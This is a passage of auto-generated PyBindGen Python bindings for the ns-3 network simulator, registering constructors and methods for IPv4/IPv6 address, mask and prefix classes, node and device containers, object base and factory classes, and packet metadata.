## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::GetSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('GetSubnetDirectedBroadcast',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsEqual(ns3::Ipv4Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Address const &', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalMulticast() const [member function]
cls.add_method('IsLocalMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): static bool ns3::Ipv4Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('IsSubnetDirectedBroadcast',
'bool',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(uint32_t address) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
return
def register_Ns3Ipv4Mask_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(ns3::Ipv4Mask const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(uint32_t mask) [constructor]
cls.add_constructor([param('uint32_t', 'mask')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(char const * mask) [constructor]
cls.add_constructor([param('char const *', 'mask')])
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::GetInverse() const [member function]
cls.add_method('GetInverse',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): uint16_t ns3::Ipv4Mask::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint16_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsEqual(ns3::Ipv4Mask other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Mask', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsMatch(ns3::Ipv4Address a, ns3::Ipv4Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Set(uint32_t mask) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'mask')])
return
def register_Ns3Ipv6Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(uint8_t * address) [constructor]
cls.add_constructor([param('uint8_t *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const & addr) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const * addr) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const *', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6Address::CombinePrefix(ns3::Ipv6Prefix const & prefix) [member function]
cls.add_method('CombinePrefix',
'ns3::Ipv6Address',
[param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv6Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv6Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllHostsMulticast() [member function]
cls.add_method('GetAllHostsMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllNodesMulticast() [member function]
cls.add_method('GetAllNodesMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllRoutersMulticast() [member function]
cls.add_method('GetAllRoutersMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv6Address::GetIpv4MappedAddress() const [member function]
cls.add_method('GetIpv4MappedAddress',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllHostsMulticast() const [member function]
cls.add_method('IsAllHostsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllNodesMulticast() const [member function]
cls.add_method('IsAllNodesMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllRoutersMulticast() const [member function]
cls.add_method('IsAllRoutersMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAny() const [member function]
cls.add_method('IsAny',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsEqual(ns3::Ipv6Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv6Address const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsIpv4MappedAddress() [member function]
cls.add_method('IsIpv4MappedAddress',
'bool',
[])
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocal() const [member function]
cls.add_method('IsLinkLocal',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocalMulticast() const [member function]
cls.add_method('IsLinkLocalMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLocalhost() const [member function]
cls.add_method('IsLocalhost',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static bool ns3::Ipv6Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsSolicitedMulticast() const [member function]
cls.add_method('IsSolicitedMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac48Address addr, ns3::Ipv6Address prefix) [member function]
cls.add_method('MakeAutoconfiguredAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac48Address mac) [member function]
cls.add_method('MakeAutoconfiguredLinkLocalAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'mac')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeIpv4MappedAddress(ns3::Ipv4Address addr) [member function]
cls.add_method('MakeIpv4MappedAddress',
'ns3::Ipv6Address',
[param('ns3::Ipv4Address', 'addr')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeSolicitedAddress(ns3::Ipv6Address addr) [member function]
cls.add_method('MakeSolicitedAddress',
'ns3::Ipv6Address',
[param('ns3::Ipv6Address', 'addr')],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(uint8_t * address) [member function]
cls.add_method('Set',
'void',
[param('uint8_t *', 'address')])
return
def register_Ns3Ipv6Prefix_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t * prefix) [constructor]
cls.add_constructor([param('uint8_t *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(char const * prefix) [constructor]
cls.add_constructor([param('char const *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t prefix) [constructor]
cls.add_constructor([param('uint8_t', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const & prefix) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const * prefix) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const *', 'prefix')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): uint8_t ns3::Ipv6Prefix::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint8_t',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsEqual(ns3::Ipv6Prefix const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv6Prefix const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsMatch(ns3::Ipv6Address a, ns3::Ipv6Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
return
def register_Ns3NetDeviceContainer_methods(root_module, cls):
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::NetDeviceContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NetDeviceContainer const &', 'arg0')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer() [constructor]
cls.add_constructor([])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::Ptr<ns3::NetDevice> dev) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::NetDevice >', 'dev')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(std::string devName) [constructor]
cls.add_constructor([param('std::string', 'devName')])
## net-device-container.h (module 'network'): ns3::NetDeviceContainer::NetDeviceContainer(ns3::NetDeviceContainer const & a, ns3::NetDeviceContainer const & b) [constructor]
cls.add_constructor([param('ns3::NetDeviceContainer const &', 'a'), param('ns3::NetDeviceContainer const &', 'b')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(ns3::NetDeviceContainer other) [member function]
cls.add_method('Add',
'void',
[param('ns3::NetDeviceContainer', 'other')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## net-device-container.h (module 'network'): void ns3::NetDeviceContainer::Add(std::string deviceName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'deviceName')])
## net-device-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::NetDevice>*,std::vector<ns3::Ptr<ns3::NetDevice>, std::allocator<ns3::Ptr<ns3::NetDevice> > > > ns3::NetDeviceContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::NetDevice > const, std::vector< ns3::Ptr< ns3::NetDevice > > >',
[],
is_const=True)
## net-device-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::NetDevice>*,std::vector<ns3::Ptr<ns3::NetDevice>, std::allocator<ns3::Ptr<ns3::NetDevice> > > > ns3::NetDeviceContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::NetDevice > const, std::vector< ns3::Ptr< ns3::NetDevice > > >',
[],
is_const=True)
## net-device-container.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::NetDeviceContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_const=True)
## net-device-container.h (module 'network'): uint32_t ns3::NetDeviceContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
return
def register_Ns3NodeContainer_methods(root_module, cls):
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'arg0')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer() [constructor]
cls.add_constructor([])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::Ptr<ns3::Node> node) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Node >', 'node')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(std::string nodeName) [constructor]
cls.add_constructor([param('std::string', 'nodeName')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd')])
## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d, ns3::NodeContainer const & e) [constructor]
cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd'), param('ns3::NodeContainer const &', 'e')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::NodeContainer other) [member function]
cls.add_method('Add',
'void',
[param('ns3::NodeContainer', 'other')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## node-container.h (module 'network'): void ns3::NodeContainer::Add(std::string nodeName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'nodeName')])
## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_const=True)
## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n) [member function]
cls.add_method('Create',
'void',
[param('uint32_t', 'n')])
## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n, uint32_t systemId) [member function]
cls.add_method('Create',
'void',
[param('uint32_t', 'n'), param('uint32_t', 'systemId')])
## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >',
[],
is_const=True)
## node-container.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NodeContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::Node >',
[param('uint32_t', 'i')],
is_const=True)
## node-container.h (module 'network'): static ns3::NodeContainer ns3::NodeContainer::GetGlobal() [member function]
cls.add_method('GetGlobal',
'ns3::NodeContainer',
[],
is_static=True)
## node-container.h (module 'network'): uint32_t ns3::NodeContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
return
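# --- Illustrative sketch (not part of the generated ns-3 bindings) ---------
# In a PyBindGen-generated module, helpers like the ones above are normally
# driven from a single register_methods(root_module) function that looks up
# each wrapped class by its C++ name and passes it in.  The (never-called)
# function below is a hypothetical, minimal driver for two of the classes
# registered in this file; the actual driver emitted for ns-3 lives elsewhere
# in this module.
def _example_register_methods(root_module):
    register_Ns3NodeContainer_methods(root_module, root_module['ns3::NodeContainer'])
    register_Ns3NetDeviceContainer_methods(root_module, root_module['ns3::NetDeviceContainer'])
    return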
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectDeleter_methods(root_module, cls):
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor]
cls.add_constructor([])
## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function]
cls.add_method('Delete',
'void',
[param('ns3::Object *', 'object')],
is_static=True)
return
def register_Ns3ObjectFactory_methods(root_module, cls):
cls.add_output_stream_operator()
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(ns3::ObjectFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(std::string typeId) [constructor]
cls.add_constructor([param('std::string', 'typeId')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::Object> ns3::ObjectFactory::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::Object >',
[],
is_const=True)
## object-factory.h (module 'core'): ns3::TypeId ns3::ObjectFactory::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
## object-factory.h (module 'core'): void ns3::ObjectFactory::Set(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('Set',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(ns3::TypeId tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('ns3::TypeId', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(char const * tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('char const *', 'tid')])
## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(std::string tid) [member function]
cls.add_method('SetTypeId',
'void',
[param('std::string', 'tid')])
return
def register_Ns3PacketMetadata_methods(root_module, cls):
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(uint64_t uid, uint32_t size) [constructor]
cls.add_constructor([param('uint64_t', 'uid'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(ns3::PacketMetadata const & o) [copy constructor]
cls.add_constructor([param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddAtEnd(ns3::PacketMetadata const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::PacketMetadata const &', 'o')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddHeader(ns3::Header const & header, uint32_t size) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddPaddingAtEnd(uint32_t end) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
[param('uint32_t', 'end')])
## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddTrailer(ns3::Trailer const & trailer, uint32_t size) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::PacketMetadata::BeginItem(ns3::Buffer buffer) const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[param('ns3::Buffer', 'buffer')],
is_const=True)
## packet-metadata.h (module 'network'): ns3::PacketMetadata ns3::PacketMetadata::CreateFragment(uint32_t start, uint32_t end) const [member function]
cls.add_method('CreateFragment',
'ns3::PacketMetadata',
[param('uint32_t', 'start'), param('uint32_t', 'end')],
is_const=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::Enable() [member function]
cls.add_method('Enable',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet-metadata.h (module 'network'): uint64_t ns3::PacketMetadata::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
